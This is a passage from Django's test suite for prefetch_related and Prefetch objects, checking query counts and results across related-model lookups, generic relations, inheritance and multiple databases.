self.assertEqual(lst1, lst2)
with self.assertNumQueries(3):
lst2 = self.traverse_qs(
Person.objects.prefetch_related(Prefetch('houses'), Prefetch('houses__rooms')),
[['houses', 'rooms']]
)
self.assertEqual(lst1, lst2)
with self.assertNumQueries(3):
lst2 = self.traverse_qs(
Person.objects.prefetch_related(Prefetch('houses', to_attr='houses_lst'), 'houses_lst__rooms'),
[['houses_lst', 'rooms']]
)
self.assertEqual(lst1, lst2)
with self.assertNumQueries(3):
lst2 = self.traverse_qs(
Person.objects.prefetch_related(
Prefetch('houses', to_attr='houses_lst'),
Prefetch('houses_lst__rooms', to_attr='rooms_lst')
),
[['houses_lst', 'rooms_lst']]
)
self.assertEqual(lst1, lst2)
def test_generic_rel(self):
bookmark = Bookmark.objects.create(url='http://www.djangoproject.com/')
TaggedItem.objects.create(content_object=bookmark, tag='django')
TaggedItem.objects.create(content_object=bookmark, favorite=bookmark, tag='python')
# Control lookups.
with self.assertNumQueries(4):
lst1 = self.traverse_qs(
Bookmark.objects.prefetch_related('tags', 'tags__content_object', 'favorite_tags'),
[['tags', 'content_object'], ['favorite_tags']]
)
# Test lookups.
with self.assertNumQueries(4):
lst2 = self.traverse_qs(
Bookmark.objects.prefetch_related(
Prefetch('tags', to_attr='tags_lst'),
Prefetch('tags_lst__content_object'),
Prefetch('favorite_tags'),
),
[['tags_lst', 'content_object'], ['favorite_tags']]
)
self.assertEqual(lst1, lst2)
def test_traverse_single_item_property(self):
# Control lookups.
with self.assertNumQueries(5):
lst1 = self.traverse_qs(
Person.objects.prefetch_related(
'houses__rooms',
'primary_house__occupants__houses',
),
[['primary_house', 'occupants', 'houses']]
)
# Test lookups.
with self.assertNumQueries(5):
lst2 = self.traverse_qs(
Person.objects.prefetch_related(
'houses__rooms',
Prefetch('primary_house__occupants', to_attr='occupants_lst'),
'primary_house__occupants_lst__houses',
),
[['primary_house', 'occupants_lst', 'houses']]
)
self.assertEqual(lst1, lst2)
def test_traverse_multiple_items_property(self):
# Control lookups.
with self.assertNumQueries(4):
lst1 = self.traverse_qs(
Person.objects.prefetch_related(
'houses',
'all_houses__occupants__houses',
),
[['all_houses', 'occupants', 'houses']]
)
# Test lookups.
with self.assertNumQueries(4):
lst2 = self.traverse_qs(
Person.objects.prefetch_related(
'houses',
Prefetch('all_houses__occupants', to_attr='occupants_lst'),
'all_houses__occupants_lst__houses',
),
[['all_houses', 'occupants_lst', 'houses']]
)
self.assertEqual(lst1, lst2)
def test_custom_qs(self):
# Test basic.
with self.assertNumQueries(2):
lst1 = list(Person.objects.prefetch_related('houses'))
with self.assertNumQueries(2):
lst2 = list(Person.objects.prefetch_related(
Prefetch('houses', queryset=House.objects.all(), to_attr='houses_lst')))
self.assertEqual(
self.traverse_qs(lst1, [['houses']]),
self.traverse_qs(lst2, [['houses_lst']])
)
# Test queryset filtering.
with self.assertNumQueries(2):
lst2 = list(
Person.objects.prefetch_related(
Prefetch(
'houses',
queryset=House.objects.filter(pk__in=[self.house1.pk, self.house3.pk]),
to_attr='houses_lst',
)
)
)
self.assertEqual(len(lst2[0].houses_lst), 1)
self.assertEqual(lst2[0].houses_lst[0], self.house1)
self.assertEqual(len(lst2[1].houses_lst), 1)
self.assertEqual(lst2[1].houses_lst[0], self.house3)
# Test flattened.
with self.assertNumQueries(3):
lst1 = list(Person.objects.prefetch_related('houses__rooms'))
with self.assertNumQueries(3):
lst2 = list(Person.objects.prefetch_related(
Prefetch('houses__rooms', queryset=Room.objects.all(), to_attr='rooms_lst')))
self.assertEqual(
self.traverse_qs(lst1, [['houses', 'rooms']]),
self.traverse_qs(lst2, [['houses', 'rooms_lst']])
)
# Test inner select_related.
with self.assertNumQueries(3):
lst1 = list(Person.objects.prefetch_related('houses__owner'))
with self.assertNumQueries(2):
lst2 = list(Person.objects.prefetch_related(
Prefetch('houses', queryset=House.objects.select_related('owner'))))
self.assertEqual(
self.traverse_qs(lst1, [['houses', 'owner']]),
self.traverse_qs(lst2, [['houses', 'owner']])
)
# Test inner prefetch.
inner_rooms_qs = Room.objects.filter(pk__in=[self.room1_1.pk, self.room1_2.pk])
houses_qs_prf = House.objects.prefetch_related(
Prefetch('rooms', queryset=inner_rooms_qs, to_attr='rooms_lst'))
with self.assertNumQueries(4):
lst2 = list(Person.objects.prefetch_related(
Prefetch('houses', queryset=houses_qs_prf.filter(pk=self.house1.pk), to_attr='houses_lst'),
Prefetch('houses_lst__rooms_lst__main_room_of')
))
self.assertEqual(len(lst2[0].houses_lst[0].rooms_lst), 2)
self.assertEqual(lst2[0].houses_lst[0].rooms_lst[0], self.room1_1)
self.assertEqual(lst2[0].houses_lst[0].rooms_lst[1], self.room1_2)
self.assertEqual(lst2[0].houses_lst[0].rooms_lst[0].main_room_of, self.house1)
self.assertEqual(len(lst2[1].houses_lst), 0)
# Test ForwardManyToOneDescriptor.
houses = House.objects.select_related('owner')
with self.assertNumQueries(6):
rooms = Room.objects.all().prefetch_related('house')
lst1 = self.traverse_qs(rooms, [['house', 'owner']])
with self.assertNumQueries(2):
rooms = Room.objects.all().prefetch_related(Prefetch('house', queryset=houses.all()))
lst2 = self.traverse_qs(rooms, [['house', 'owner']])
self.assertEqual(lst1, lst2)
with self.assertNumQueries(2):
houses = House.objects.select_related('owner')
rooms = Room.objects.all().prefetch_related(Prefetch('house', queryset=houses.all(), to_attr='house_attr'))
lst2 = self.traverse_qs(rooms, [['house_attr', 'owner']])
self.assertEqual(lst1, lst2)
room = Room.objects.all().prefetch_related(
Prefetch('house', queryset=houses.filter(address='DoesNotExist'))
).first()
with self.assertRaises(ObjectDoesNotExist):
getattr(room, 'house')
room = Room.objects.all().prefetch_related(
Prefetch('house', queryset=houses.filter(address='DoesNotExist'), to_attr='house_attr')
).first()
self.assertIsNone(room.house_attr)
rooms = Room.objects.all().prefetch_related(Prefetch('house', queryset=House.objects.only('name')))
with self.assertNumQueries(2):
getattr(rooms.first().house, 'name')
with self.assertNumQueries(3):
getattr(rooms.first().house, 'address')
# Test ReverseOneToOneDescriptor.
houses = House.objects.select_related('owner')
with self.assertNumQueries(6):
rooms = Room.objects.all().prefetch_related('main_room_of')
lst1 = self.traverse_qs(rooms, [['main_room_of', 'owner']])
with self.assertNumQueries(2):
rooms = Room.objects.all().prefetch_related(Prefetch('main_room_of', queryset=houses.all()))
lst2 = self.traverse_qs(rooms, [['main_room_of', 'owner']])
self.assertEqual(lst1, lst2)
with self.assertNumQueries(2):
rooms = list(
Room.objects.all().prefetch_related(
Prefetch('main_room_of', queryset=houses.all(), to_attr='main_room_of_attr')
)
)
lst2 = self.traverse_qs(rooms, [['main_room_of_attr', 'owner']])
self.assertEqual(lst1, lst2)
room = Room.objects.filter(main_room_of__isnull=False).prefetch_related(
Prefetch('main_room_of', queryset=houses.filter(address='DoesNotExist'))
).first()
with self.assertRaises(ObjectDoesNotExist):
getattr(room, 'main_room_of')
room = Room.objects.filter(main_room_of__isnull=False).prefetch_related(
Prefetch('main_room_of', queryset=houses.filter(address='DoesNotExist'), to_attr='main_room_of_attr')
).first()
self.assertIsNone(room.main_room_of_attr)
# The custom queryset filters should be applied to the queryset
# instance returned by the manager.
person = Person.objects.prefetch_related(
Prefetch('houses', queryset=House.objects.filter(name='House 1')),
).get(pk=self.person1.pk)
self.assertEqual(
list(person.houses.all()),
list(person.houses.all().all()),
)
def test_nested_prefetch_related_are_not_overwritten(self):
# Regression test for #24873
houses_2 = House.objects.prefetch_related(Prefetch('rooms'))
persons = Person.objects.prefetch_related(Prefetch('houses', queryset=houses_2))
houses = House.objects.prefetch_related(Prefetch('occupants', queryset=persons))
list(houses) # queryset must be evaluated once to reproduce the bug.
self.assertEqual(
houses.all()[0].occupants.all()[0].houses.all()[1].rooms.all()[0],
self.room2_1
)
def test_nested_prefetch_related_with_duplicate_prefetcher(self):
"""
Nested prefetches whose name clashes with descriptor names
(Person.houses here) are allowed.
"""
occupants = Person.objects.prefetch_related(
Prefetch('houses', to_attr='some_attr_name'),
Prefetch('houses', queryset=House.objects.prefetch_related('main_room')),
)
houses = House.objects.prefetch_related(Prefetch('occupants', queryset=occupants))
with self.assertNumQueries(5):
self.traverse_qs(list(houses), [['occupants', 'houses', 'main_room']])
def test_values_queryset(self):
with self.assertRaisesMessage(ValueError, 'Prefetch querysets cannot use values().'):
Prefetch('houses', House.objects.values('pk'))
# That error doesn't affect managers with custom ModelIterable subclasses
self.assertIs(Teacher.objects_custom.all()._iterable_class, ModelIterableSubclass)
Prefetch('teachers', Teacher.objects_custom.all())
def test_to_attr_doesnt_cache_through_attr_as_list(self):
house = House.objects.prefetch_related(
Prefetch('rooms', queryset=Room.objects.all(), to_attr='to_rooms'),
).get(pk=self.house3.pk)
self.assertIsInstance(house.rooms.all(), QuerySet)
def test_to_attr_cached_property(self):
persons = Person.objects.prefetch_related(
Prefetch('houses', House.objects.all(), to_attr='cached_all_houses'),
)
for person in persons:
# To bypass caching at the related descriptor level, don't use
# person.houses.all() here.
all_houses = list(House.objects.filter(occupants=person))
with self.assertNumQueries(0):
self.assertEqual(person.cached_all_houses, all_houses)
class DefaultManagerTests(TestCase):
def setUp(self):
self.qual1 = Qualification.objects.create(name="BA")
self.qual2 = Qualification.objects.create(name="BSci")
self.qual3 = Qualification.objects.create(name="MA")
self.qual4 = Qualification.objects.create(name="PhD")
self.teacher1 = Teacher.objects.create(name="Mr Cleese")
self.teacher2 = Teacher.objects.create(name="Mr Idle")
self.teacher3 = Teacher.objects.create(name="Mr Chapman")
self.teacher1.qualifications.add(self.qual1, self.qual2, self.qual3, self.qual4)
self.teacher2.qualifications.add(self.qual1)
self.teacher3.qualifications.add(self.qual2)
self.dept1 = Department.objects.create(name="English")
self.dept2 = Department.objects.create(name="Physics")
self.dept1.teachers.add(self.teacher1, self.teacher2)
self.dept2.teachers.add(self.teacher1, self.teacher3)
def test_m2m_then_m2m(self):
with self.assertNumQueries(3):
# When we prefetch the teachers, and force the query, we don't want
# the default manager on teachers to immediately get all the related
# qualifications, since this will do one query per teacher.
qs = Department.objects.prefetch_related('teachers')
depts = "".join("%s department: %s\n" %
(dept.name, ", ".join(str(t) for t in dept.teachers.all()))
for dept in qs)
self.assertEqual(depts,
"English department: Mr Cleese (BA, BSci, MA, PhD), Mr Idle (BA)\n"
"Physics department: Mr Cleese (BA, BSci, MA, PhD), Mr Chapman (BSci)\n")
class GenericRelationTests(TestCase):
@classmethod
def setUpTestData(cls):
book1 = Book.objects.create(title="Winnie the Pooh")
book2 = Book.objects.create(title="Do you like green eggs and spam?")
book3 = Book.objects.create(title="Three Men In A Boat")
reader1 = Reader.objects.create(name="me")
reader2 = Reader.objects.create(name="you")
reader3 = Reader.objects.create(name="someone")
book1.read_by.add(reader1, reader2)
book2.read_by.add(reader2)
book3.read_by.add(reader3)
cls.book1, cls.book2, cls.book3 = book1, book2, book3
cls.reader1, cls.reader2, cls.reader3 = reader1, reader2, reader3
def test_prefetch_GFK(self):
TaggedItem.objects.create(tag="awesome", content_object=self.book1)
TaggedItem.objects.create(tag="great", content_object=self.reader1)
TaggedItem.objects.create(tag="outstanding", content_object=self.book2)
TaggedItem.objects.create(tag="amazing", content_object=self.reader3)
# 1 for TaggedItem table, 1 for Book table, 1 for Reader table
with self.assertNumQueries(3):
qs = TaggedItem.objects.prefetch_related('content_object')
list(qs)
def test_prefetch_GFK_nonint_pk(self):
Comment.objects.create(comment="awesome", content_object=self.book1)
# 1 for Comment table, 1 for Book table
with self.assertNumQueries(2):
qs = Comment.objects.prefetch_related('content_object')
[c.content_object for c in qs]
def test_traverse_GFK(self):
"""
A 'content_object' can be traversed with prefetch_related() and
get to related objects on the other side (assuming it is suitably
filtered)
"""
TaggedItem.objects.create(tag="awesome", content_object=self.book1)
TaggedItem.objects.create(tag="awesome", content_object=self.book2)
TaggedItem.objects.create(tag="awesome", content_object=self.book3)
TaggedItem.objects.create(tag="awesome", content_object=self.reader1)
TaggedItem.objects.create(tag="awesome", content_object=self.reader2)
ct = ContentType.objects.get_for_model(Book)
# We get 3 queries - 1 for main query, 1 for content_objects since they
# all use the same table, and 1 for the 'read_by' relation.
with self.assertNumQueries(3):
# If we limit to books, we know that they will have 'read_by'
# attributes, so the following makes sense:
qs = TaggedItem.objects.filter(content_type=ct, tag='awesome').prefetch_related('content_object__read_by')
readers_of_awesome_books = {r.name for tag in qs
for r in tag.content_object.read_by.all()}
self.assertEqual(readers_of_awesome_books, {"me", "you", "someone"})
def test_nullable_GFK(self):
TaggedItem.objects.create(tag="awesome", content_object=self.book1,
created_by=self.reader1)
TaggedItem.objects.create(tag="great", content_object=self.book2)
TaggedItem.objects.create(tag="rubbish", content_object=self.book3)
with self.assertNumQueries(2):
result = [t.created_by for t in TaggedItem.objects.prefetch_related('created_by')]
self.assertEqual(result,
[t.created_by for t in TaggedItem.objects.all()])
def test_generic_relation(self):
bookmark = Bookmark.objects.create(url='http://www.djangoproject.com/')
TaggedItem.objects.create(content_object=bookmark, tag='django')
TaggedItem.objects.create(content_object=bookmark, tag='python')
with self.assertNumQueries(2):
tags = [t.tag for b in Bookmark.objects.prefetch_related('tags')
for t in b.tags.all()]
self.assertEqual(sorted(tags), ["django", "python"])
def test_charfield_GFK(self):
b = Bookmark.objects.create(url='http://www.djangoproject.com/')
TaggedItem.objects.create(content_object=b, tag='django')
TaggedItem.objects.create(content_object=b, favorite=b, tag='python')
with self.assertNumQueries(3):
bookmark = Bookmark.objects.filter(pk=b.pk).prefetch_related('tags', 'favorite_tags')[0]
self.assertEqual(sorted(i.tag for i in bookmark.tags.all()), ["django", "python"])
self.assertEqual([i.tag for i in bookmark.favorite_tags.all()], ["python"])
def test_custom_queryset(self):
bookmark = Bookmark.objects.create(url='http://www.djangoproject.com/')
django_tag = TaggedItem.objects.create(content_object=bookmark, tag='django')
TaggedItem.objects.create(content_object=bookmark, tag='python')
with self.assertNumQueries(2):
bookmark = Bookmark.objects.prefetch_related(
Prefetch('tags', TaggedItem.objects.filter(tag='django')),
).get()
with self.assertNumQueries(0):
self.assertEqual(list(bookmark.tags.all()), [django_tag])
# The custom queryset filters should be applied to the queryset
# instance returned by the manager.
self.assertEqual(list(bookmark.tags.all()), list(bookmark.tags.all().all()))
class MultiTableInheritanceTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.book1 = BookWithYear.objects.create(title='Poems', published_year=2010)
cls.book2 = BookWithYear.objects.create(title='More poems', published_year=2011)
cls.author1 = AuthorWithAge.objects.create(name='Jane', first_book=cls.book1, age=50)
cls.author2 = AuthorWithAge.objects.create(name='Tom', first_book=cls.book1, age=49)
cls.author3 = AuthorWithAge.objects.create(name='Robert', first_book=cls.book2, age=48)
cls.author_address = AuthorAddress.objects.create(author=cls.author1, address='SomeStreet 1')
cls.book2.aged_authors.add(cls.author2, cls.author3)
cls.br1 = BookReview.objects.create(book=cls.book1, notes='review book1')
cls.br2 = BookReview.objects.create(book=cls.book2, notes='review book2')
def test_foreignkey(self):
with self.assertNumQueries(2):
qs = AuthorWithAge.objects.prefetch_related('addresses')
addresses = [[str(address) for address in obj.addresses.all()] for obj in qs]
self.assertEqual(addresses, [[str(self.author_address)], [], []])
def test_foreignkey_to_inherited(self):
with self.assertNumQueries(2):
qs = BookReview.objects.prefetch_related('book')
titles = [obj.book.title for obj in qs]
self.assertEqual(titles, ["Poems", "More poems"])
def test_m2m_to_inheriting_model(self):
qs = AuthorWithAge.objects.prefetch_related('books_with_year')
with self.assertNumQueries(2):
lst = [[str(book) for book in author.books_with_year.all()] for author in qs]
qs = AuthorWithAge.objects.all()
lst2 = [[str(book) for book in author.books_with_year.all()] for author in qs]
self.assertEqual(lst, lst2)
qs = BookWithYear.objects.prefetch_related('aged_authors')
with self.assertNumQueries(2):
lst = [[str(author) for author in book.aged_authors.all()] for book in qs]
qs = BookWithYear.objects.all()
lst2 = [[str(author) for author in book.aged_authors.all()] for book in qs]
self.assertEqual(lst, lst2)
def test_parent_link_prefetch(self):
with self.assertNumQueries(2):
[a.author for a in AuthorWithAge.objects.prefetch_related('author')]
@override_settings(DEBUG=True)
def test_child_link_prefetch(self):
with self.assertNumQueries(2):
authors = [a.authorwithage for a in Author.objects.prefetch_related('authorwithage')]
# Regression for #18090: the prefetching query must include an IN clause.
# Note that on Oracle the table name is upper case in the generated SQL,
# thus the .lower() call.
self.assertIn('authorwithage', connection.queries[-1]['sql'].lower())
self.assertIn(' IN ', connection.queries[-1]['sql'])
self.assertEqual(authors, [a.authorwithage for a in Author.objects.all()])
class ForeignKeyToFieldTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.book = Book.objects.create(title='Poems')
cls.author1 = Author.objects.create(name='Jane', first_book=cls.book)
cls.author2 = Author.objects.create(name='Tom', first_book=cls.book)
cls.author3 = Author.objects.create(name='Robert', first_book=cls.book)
cls.author_address = AuthorAddress.objects.create(author=cls.author1, address='SomeStreet 1')
FavoriteAuthors.objects.create(author=cls.author1, likes_author=cls.author2)
FavoriteAuthors.objects.create(author=cls.author2, likes_author=cls.author3)
FavoriteAuthors.objects.create(author=cls.author3, likes_author=cls.author1)
def test_foreignkey(self):
with self.assertNumQueries(2):
qs = Author.objects.prefetch_related('addresses')
addresses = [[str(address) for address in obj.addresses.all()]
for obj in qs]
self.assertEqual(addresses, [[str(self.author_address)], [], []])
def test_m2m(self):
with self.assertNumQueries(3):
qs = Author.objects.all().prefetch_related('favorite_authors', 'favors_me')
favorites = [(
[str(i_like) for i_like in author.favorite_authors.all()],
[str(likes_me) for likes_me in author.favors_me.all()]
) for author in qs]
self.assertEqual(
favorites,
[
([str(self.author2)], [str(self.author3)]),
([str(self.author3)], [str(self.author1)]),
([str(self.author1)], [str(self.author2)])
]
)
class LookupOrderingTest(TestCase):
"""
Test cases that demonstrate that ordering of lookups is important, and
ensure it is preserved.
"""
def setUp(self):
self.person1 = Person.objects.create(name="Joe")
self.person2 = Person.objects.create(name="Mary")
# Set main_room for each house before creating the next one for
# databases where supports_nullable_unique_constraints is False.
self.house1 = House.objects.create(address="123 Main St")
self.room1_1 = Room.objects.create(name="Dining room", house=self.house1)
self.room1_2 = Room.objects.create(name="Lounge", house=self.house1)
self.room1_3 = Room.objects.create(name="Kitchen", house=self.house1)
self.house1.main_room = self.room1_1
self.house1.save()
self.person1.houses.add(self.house1)
self.house2 = House.objects.create(address="45 Side St")
self.room2_1 = Room.objects.create(name="Dining room", house=self.house2)
self.room2_2 = Room.objects.create(name="Lounge", house=self.house2)
self.house2.main_room = self.room2_1
self.house2.save()
self.person1.houses.add(self.house2)
self.house3 = House.objects.create(address="6 Downing St")
self.room3_1 = Room.objects.create(name="Dining room", house=self.house3)
self.room3_2 = Room.objects.create(name="Lounge", house=self.house3)
self.room3_3 = Room.objects.create(name="Kitchen", house=self.house3)
self.house3.main_room = self.room3_1
self.house3.save()
self.person2.houses.add(self.house3)
self.house4 = House.objects.create(address="7 Regents St")
self.room4_1 = Room.objects.create(name="Dining room", house=self.house4)
self.room4_2 = Room.objects.create(name="Lounge", house=self.house4)
self.house4.main_room = self.room4_1
self.house4.save()
self.person2.houses.add(self.house4)
def test_order(self):
with self.assertNumQueries(4):
# The following two queries must be done in the same order as written,
# otherwise 'primary_house' will cause non-prefetched lookups
qs = Person.objects.prefetch_related('houses__rooms',
'primary_house__occupants')
[list(p.primary_house.occupants.all()) for p in qs]
class NullableTest(TestCase):
@classmethod
def setUpTestData(cls):
boss = Employee.objects.create(name="Peter")
Employee.objects.create(name="Joe", boss=boss)
Employee.objects.create(name="Angela", boss=boss)
def test_traverse_nullable(self):
# Because we use select_related() for 'boss', it doesn't need to be
# prefetched, but we can still traverse it although it contains some nulls
with self.assertNumQueries(2):
qs = Employee.objects.select_related('boss').prefetch_related('boss__serfs')
co_serfs = [list(e.boss.serfs.all()) if e.boss is not None else []
for e in qs]
qs2 = Employee.objects.select_related('boss')
co_serfs2 = [list(e.boss.serfs.all()) if e.boss is not None else [] for e in qs2]
self.assertEqual(co_serfs, co_serfs2)
def test_prefetch_nullable(self):
# One for main employee, one for boss, one for serfs
with self.assertNumQueries(3):
qs = Employee.objects.prefetch_related('boss__serfs')
co_serfs = [list(e.boss.serfs.all()) if e.boss is not None else []
for e in qs]
qs2 = Employee.objects.all()
co_serfs2 = [list(e.boss.serfs.all()) if e.boss is not None else [] for e in qs2]
self.assertEqual(co_serfs, co_serfs2)
def test_in_bulk(self):
"""
        in_bulk() correctly prefetches related objects because it does not
        call .iterator() directly.
"""
boss1 = Employee.objects.create(name="Peter")
boss2 = Employee.objects.create(name="Jack")
with self.assertNumQueries(2):
# Prefetch is done and it does not cause any errors.
bulk = Employee.objects.prefetch_related('serfs').in_bulk([boss1.pk, boss2.pk])
for b in bulk.values():
list(b.serfs.all())
class MultiDbTests(TestCase):
multi_db = True
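    # multi_db = True gives these tests access to the extra 'other' database
    # that the .using('other') calls below rely on.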
def test_using_is_honored_m2m(self):
B = Book.objects.using('other')
A = Author.objects.using('other')
book1 = B.create(title="Poems")
book2 = B.create(title="Jane Eyre")
book3 = B.create(title="Wuthering Heights")
book4 = B.create(title="Sense and Sensibility")
author1 = A.create(name="Charlotte", first_book=book1)
author2 = A.create(name="Anne", first_book=book1)
author3 = A.create(name="Emily", first_book=book1)
author4 = A.create(name="Jane", first_book=book4)
book1.authors.add(author1, author2, author3)
book2.authors.add(author1)
book3.authors.add(author3)
book4.authors.add(author4)
# Forward
qs1 = B.prefetch_related('authors')
with self.assertNumQueries(2, using='other'):
books = "".join("%s (%s)\n" %
(book.title, ", ".join(a.name for a in book.authors.all()))
for book in qs1)
self.assertEqual(books,
"Poems (Charlotte, Anne, Emily)\n"
"Jane Eyre (Charlotte)\n"
"Wuthering Heights (Emily)\n"
"Sense and Sensibility (Jane)\n")
# Reverse
qs2 = A.prefetch_related('books')
with self.assertNumQueries(2, using='other'):
authors = "".join("%s: %s\n" %
(author.name, ", ".join(b.title for b in author.books.all()))
for author in qs2)
self.assertEqual(authors,
"Charlotte: Poems, Jane Eyre\n"
"Anne: Poems\n"
"Emily: Poems, Wuthering Heights\n"
"Jane: Sense and Sensibility\n")
def test_using_is_honored_fkey(self):
B = Book.objects.using('other')
A = Author.objects.using('other')
book1 = B.create(title="Poems")
book2 = B.create(title="Sense and Sensibility")
A.create(name="Charlotte Bronte", first_book=book1)
A.create(name="Jane Austen", first_book=book2)
# Forward
with self.assertNumQueries(2, using='other'):
books = ", ".join(a.first_book.title for a in A.prefetch_related('first_book'))
self.assertEqual("Poems, Sense and Sensibility", books)
# Reverse
with self.assertNumQueries(2, using='other'):
books = "".join("%s (%s)\n" %
(b.title, ", ".join(a.name for a in b.first_time_authors.all()))
for b in B.prefetch_related('first_time_authors'))
self.assertEqual(books,
"Poems (Charlotte Bronte)\n"
"Sense and Sensibility (Jane Austen)\n")
def test_using_is_honored_inheritance(self):
B = BookWithYear.objects.using('other')
A = AuthorWithAge.objects.using('other')
book1 = B.create(title="Poems", published_year=2010)
B.create(title="More poems", published_year=2011)
A.create(name='Jane', first_book=book1, age=50)
A.create(name='Tom', first_book=book1, age=49)
# parent link
with self.assertNumQueries(2, using='other'):
authors = ", ".join(a.author.name for a in A.prefetch_related('author'))
self.assertEqual(authors, "Jane, Tom")
# child link
with self.assertNumQueries(2, using='other'):
ages = ", ".join(str(a.authorwithage.age) for a in A.prefetch_related('authorwithage'))
self.assertEqual(ages, "50, 49")
def test_using_is_honored_custom_qs(self):
B = Book.objects.using('other')
A = Author.objects.using('other')
book1 = B.create(title="Poems")
book2 = B.create(title="Sense and Sensibility")
A.create(name="Charlotte Bronte", first_book=book1)
A.create(name="Jane Austen", first_book=book2)
# Implicit hinting
with self.assertNumQueries(2, using='other'):
prefetch = Prefetch('first_time_authors', queryset=Author.objects.all())
books = "".join("%s (%s)\n" %
(b.title, ", ".join(a.name for a in b.first_time_authors.all()))
for b in B.prefetch_related(prefetch))
self.assertEqual(books,
"Poems (Charlotte Bronte)\n"
"Sense and Sensibility (Jane Austen)\n")
# Explicit using on the same db.
with self.assertNumQueries(2, using='other'):
prefetch = Prefetch('first_time_authors', queryset=Author.objects.using('other'))
books = "".join("%s (%s)\n" %
(b.title, ", ".join(a.name for a in b.first_time_authors.all()))
for b in B.prefetch_related(prefetch))
self.assertEqual(books,
"Poems (Charlotte Bronte)\n"
"Sense and Sensibility (Jane Austen)\n")
# Explicit using on a different db.
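        # The 'default' database holds no matching authors, so this prefetch
        # issues one query per database and every author list comes back empty.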
with self.assertNumQueries(1, using='default'), self.assertNumQueries(1, using='other'):
prefetch = Prefetch('first_time_authors', queryset=Author.objects.using('default'))
books = "".join("%s (%s)\n" %
(b.title, ", ".join(a.name for a in b.first_time_authors.all()))
for b in B.prefetch_related(prefetch))
self.assertEqual(books,
"Poems ()\n"
"Sense and Sensibility ()\n")
class Ticket19607Tests(TestCase):
def setUp(self):
for id, name1, name2 in [
(1, 'einfach', 'simple'),
(2, 'schwierig', 'difficult'),
]:
LessonEntry.objects.create(id=id, name1=name1, name2=name2)
for id, lesson_entry_id, name in [
(1, 1, 'einfach'),
(2, 1, 'simple'),
(3, 2, 'schwierig'),
(4, 2, 'difficult'),
]:
WordEntry.objects.create(id=id, lesson_entry_id=lesson_entry_id, name=name)
def test_bug(self):
list(WordEntry.objects.prefetch_related('lesson_entry', 'lesson_entry__wordentry_set'))
class Ticket21410Tests(TestCase):
def setUp(self):
self.book1 = Book.objects.create(title="Poems")
self.book2 = Book.objects.create(title="Jane Eyre")
self.book3 = Book.objects.create(title="Wuthering Heights")
self.book4 = Book.objects.create(title="Sense and Sensibility")
self.author1 = Author2.objects.create(name="Charlotte", first_book=self.book1)
self.author2 = Author2.objects.create(name="Anne", first_book=self.book1)
self.author3 = Author2.objects.create(name="Emily", first_book=self.book1)
self.author4 = Author2.objects.create(name="Jane", first_book=self.book4)
self.author1.favorite_books.add(self.book1, self.book2, self.book3)
self.author2.favorite_books.add(self.book1)
self.author3.favorite_books.add(self.book2)
self.author4.favorite_books.add(self.book3)
def test_bug(self):
list(Author2.objects.prefetch_related('first_book', 'favorite_books'))
class Ticket21760Tests(TestCase):
def setUp(self):
self.rooms = []
for _ in range(3):
house = House.objects.create()
for _ in range(3):
self.rooms.append(Room.objects.create(house=house))
# Set main_room for each house before creating the next one for
# databases where supports_nullable_unique_constraints is False.
house.main_room = self.rooms[-3]
house.save()
def test_bug(self):
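        # get_prefetcher() returns a tuple whose first item is the prefetcher
        # object; only that is needed here to build the prefetch queryset.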
prefetcher = get_prefetcher(self.rooms[0], 'house', 'house')[0]
queryset = prefetcher.get_prefetch_queryset(list(Room.objects.all()))[0]
self.assertNotIn(' JOIN ', str(queryset.query))
class DirectPrefetchedObjectCacheReuseTests(TestCase):
"""
prefetch_related() reuses objects fetched in _prefetched_objects_cache.
When objects are prefetched and not stored as an instance attribute (often
intermediary relationships), they are saved to the
_prefetched_objects_cache attribute. prefetch_related() takes
_prefetched_objects_cache into account when determining whether an object
    has been fetched [1] and retrieves results from it when it is populated [2].
[1]: #25546 (duplicate queries on nested Prefetch)
[2]: #27554 (queryset evaluation fails with a mix of nested and flattened
prefetches)
"""
@classmethod
def setUpTestData(cls):
cls.book1, cls.book2 = [
Book.objects.create(title='book1'),
Book.objects.create(title='book2'),
]
cls.author11, cls.author12, cls.author21 = [
Author.objects.create(first_book=cls.book1, name='Author11'),
Author.objects.create(first_book=cls.book1, name='Author12'),
Author.objects.create(first_book=cls.book2, name='Author21'),
]
cls.author1_address1, cls.author1_address2, cls.author2_address1 = [
AuthorAddress.objects.create(author=cls.author11, address='Happy place'),
AuthorAddress.objects.create(author=cls.author12, address='Haunted house'),
AuthorAddress.objects.create(author=cls.author21, address='Happy place'),
]
cls.bookwithyear1 = BookWithYear.objects.create(title='Poems', published_year=2010)
cls.bookreview1 = BookReview.objects.create(book=cls.bookwithyear1)
def test_detect_is_fetched(self):
"""
Nested prefetch_related() shouldn't trigger duplicate queries for the same
lookup.
"""
with self.assertNumQueries(3):
books = Book.objects.filter(
title__in=['book1', 'book2'],
).prefetch_related(
Prefetch(
'first_time_authors',
Author.objects.prefetch_related(
Prefetch(
'addresses',
AuthorAddress.objects.filter(address='Happy place'),
)
),
),
)
book1, book2 = list(books)
with self.assertNumQueries(0):
self.assertSequenceEqual(book1.first_time_authors.all(), [self.author11, self.author12])
self.assertSequenceEqual(book2.first_time_authors.all(), [self.author21])
self.assertSequenceEqual(book1.first_time_authors.all()[0].addresses.all(), [self.author1_address1])
self.assertSequenceEqual(book1.first_time_authors.all()[1].addresses.all(), [])
self.assertSequenceEqual(book2.first_time_authors.all()[0].addresses.all(), [self.author2_address1])
self.assertEqual(
list(book1.first_time_authors.all()), list(book1.first_time_authors.all().all())
)
self.assertEqual(
list(book2.first_time_authors.all()), list(book2.first_time_authors.all().all())
)
self.assertEqual(
list(book1.first_time_authors.all()[0].addresses.all()),
list(book1.first_time_authors.all()[0].addresses.all().all())
)
self.assertEqual(
list(book1.first_time_authors.all()[1].addresses.all()),
list(book1.first_time_authors.all()[1].addresses.all().all())
)
self.assertEqual(
list(book2.first_time_authors.all()[0].addresses.all()),
list(book2.first_time_authors.all()[0].addresses.all().all())
)
def test_detect_is_fetched_with_to_attr(self):
with self.assertNumQueries(3):
books = Book.objects.filter(
title__in=['book1', 'book2'],
).prefetch_related(
Prefetch(
'first_time_authors',
Author.objects.prefetch_related(
Prefetch(
'addresses',
AuthorAddress.objects.filter(address='Happy place'),
to_attr='happy_place',
)
),
to_attr='first_authors',
),
)
book1, book2 = list(books)
with self.assertNumQueries(0):
self.assertEqual(book1.first_authors, [self.author11, self.author12])
self.assertEqual(book2.first_authors, [self.author21])
self.assertEqual(book1.first_authors[0].happy_place, [self.author1_address1])
